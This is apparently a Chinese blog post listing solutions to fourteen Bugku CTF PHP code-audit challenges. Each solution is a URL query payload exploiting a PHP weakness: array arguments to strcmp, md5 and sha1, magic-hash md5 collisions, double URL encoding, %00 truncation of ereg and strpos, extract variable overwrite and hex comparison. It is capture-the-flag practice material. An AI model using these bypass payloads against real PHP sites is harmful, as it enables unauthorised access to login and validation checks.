2019-03-31


Bugku-代码审计

https://ctf.bugku.com/challenges

1、extract变量覆盖

?flag=&shiyan=

2、strcmp比较字符串

?a[]=1

3、urldecode二次编码绕过

?id=%2568%2561%2563%256B%2565%2572%2544%254A

4、md5()函数

?username[]=1&password[]=2

5、数组返回NULL绕过

?password[]=1

?password=aA0%00--

6、弱类型整数大小比较绕过

?password[]=1

7、sha()函数比较绕过

?name[]=1&password[]=2

8、md5加密相等绕过

?a=s878926199a

9、十六进制与数字比较

?password=0xdeadc0de

10、变量覆盖

?a=&b=

11、ereg正则%00截断

?password[]=1

?password=1e9%00*-*

12、strpos数组绕过

?ctf[]=1

?ctf=1%00%23biubiubiu

13、数字验证正则绕过

42.00e+00000000000

14、简单的waf

打不开。

你可能感兴趣的:(2019-03-31)